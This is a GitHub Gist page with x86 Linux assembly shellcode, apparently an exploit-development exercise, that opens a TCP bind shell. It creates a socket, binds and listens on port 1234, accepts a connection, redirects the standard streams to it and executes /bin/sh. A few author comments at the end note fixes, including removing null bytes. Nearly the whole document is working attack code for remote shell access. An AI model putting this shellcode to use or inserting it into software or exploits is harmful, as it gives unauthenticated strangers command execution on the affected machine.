Last active
January 25, 2018 14:43
-
-
Save jiachen247/a20da4ce1ae1aabd64e25027a57ea27a to your computer and use it in GitHub Desktop.
tcp-bind.asm
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Filename: bind-tcp.nasm | |
| ; Author: nehcaij | |
| ; | |
| ; Purpose: to start a bind shell | |
| global _start | |
| section .text | |
| _start: | |
| ; part 1 | |
| ; socketcall(1, args) | |
| ; socket(2,1,0) | |
| xor eax, eax | |
| xor ebx, ebx | |
| inc ebx | |
| push eax | |
| push ebx | |
| push dword 0x2 | |
| mov eax, 0x66 ; socketcall(102) | |
| mov ecx, esp ; pointer to args in stack | |
| int 0x80 | |
| mov esi, eax ; store new fd in esi | |
| ; part 2 | |
| ; socketcall(0xE, args) | |
| ; setsockopts(fd/esi, 1, 2, *(1), 4) | |
| push dword 0x4 | |
| push true | |
| push dword 0x2 | |
| push ebx | |
| push esi | |
| mov eax, 0x66 ; socketcall(102) | |
| xor ebx, ebx | |
| mov ebx, 0xE | |
| mov ecx, esp ; pointer to args in stack | |
| int 0x80 | |
| ; part 3 | |
| ; socketcall(2, args) | |
| ; bind(fd/esi, &sockaddr, 16) | |
| ; struct sockaddr_in -> (8bytedx0, 0.0.0.0, 1234, AF_INET(2)) | |
| push dword 0x0 ; sin_zero | |
| push dword 0x0 ; sin_zero | |
| push dword 0x0 ; sin_addr 0.0.0.0 | |
| push word 0xD204 ; port 1234 | |
| push word 0x2 ; sin_family AF_INET | |
| mov eax, esp ; pointer to sockaddr | |
| push dword 0x10 ; size of sockaddr 16 bytes | |
| push eax ; ptr to sockaddr struct | |
| push esi ; | |
| mov eax, 0x66 ; socketcall(102) | |
| xor ebx, ebx | |
| mov ebx, 0x2 ; | |
| mov ecx, esp ; pointer to args in stack | |
| int 0x80 | |
| ; part 4 | |
| ; socketcall(4, args) | |
| ; listen(sockfd, 0); | |
| xor eax, eax | |
| push eax | |
| push esi | |
| mov eax, 0x66 ; socketcall(102) | |
| xor ebx, ebx | |
| mov ebx, 0x4 ; | |
| mov ecx, esp ; pointer to args in stack | |
| int 0x80 | |
| ; part 5 | |
| ; socketcall(5, args) | |
| ; int accept4(int sockfd, struct sockaddr *addr, NULL, NULL); | |
| xor eax, eax | |
| push eax ; NULL | |
| push eax ; NULL | |
| push esi ; fd | |
| mov eax, 0x66 ; socketcall(102) | |
| xor ebx, ebx | |
| mov ebx, 0x5 ; | |
| mov ecx, esp ; pointer to args in stack | |
| int 0x80 | |
| ; eax now will contain return value | |
| ; part 6 | |
| ; dup2(resultfd, 0) | |
| ; dup2(resultfd, 1) | |
| ; dup2(resultfd, 2) | |
| mov ebx, eax ; result fd | |
| xor eax, eax | |
| mov eax, 0x3F | |
| mov ecx, 0x0 | |
| int 0x80 | |
| mov eax, 0x3F | |
| inc ecx | |
| int 0x80 | |
| mov eax, 0x3F | |
| inc ecx | |
| int 0x80 | |
| ; part 7 | |
| ; execve(*"/bin/sh", NULL, NULL) | |
| xor eax,eax | |
| push eax | |
| push 0x68732f2f ; hs// - take care to the little endian representation | |
| push 0x6e69622f ; nib/ | |
| mov ebx, esp ; pointer to command string | |
| mov ecx, eax | |
| mov edx, eax | |
| mov al, 0xB ; __NR_execve | |
| int 0x80 | |
| ; exit gracefully | |
| mov eax, 1 | |
| mov ebx, 0 | |
| int 0x80 | |
| section .data | |
| true: dw 0x00000001 |
size of sock address 16base10 is 0x10 instead of 0x20
2nd arg for execve args can be set to null
need to remove null bytes
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
port number should be represented in little endian -> 0xD204